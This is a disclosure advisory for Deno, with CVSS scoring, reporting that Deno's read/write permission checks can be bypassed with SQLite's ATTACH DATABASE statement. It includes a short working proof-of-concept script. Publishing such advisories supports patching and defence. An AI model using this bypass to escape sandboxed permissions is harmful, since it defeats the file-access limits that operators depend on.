- Reported
-
- Issued
-
- Package
-
deno
(crates.io)
- Type
-
Vulnerability
- Keywords
-
#read-write-bypass
- Aliases
-
- References
-
- CVSS Score
- 5.5
MEDIUM
- CVSS Details
-
- Attack Complexity
- Low
- Attack Requirements
- None
- Attack Vector
- Network
- Privileges Required
- None
- Availability Impact to the Subsequent System
- None
- Confidentiality Impact to the Subsequent System
- None
- Integrity Impact to the Subsequent System
- None
- User Interaction
- None
- Availability Impact to the Vulnerable System
- None
- Confidentiality Impact to the Vulnerable System
- None
- Integrity Impact to the Vulnerable System
- Low
- Exploit Maturity
- ProofOfConcept
- CVSS Vector
- CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
- Patched
-
- Unaffected
-
Description
It is possible to bypass Deno's read/write permission
checks by using ATTACH DATABASE statement.
PoC
// poc.js
import { DatabaseSync } from "node:sqlite"
const db = new DatabaseSync(":memory:");
db.exec("ATTACH DATABASE 'test.db' as test;");
db.exec("CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);");
$ deno poc.js
Advisory available under CC-BY-4.0
license.
Source: https://github.com/denoland/deno/security/advisories/GHSA-8vxj-4cph-c596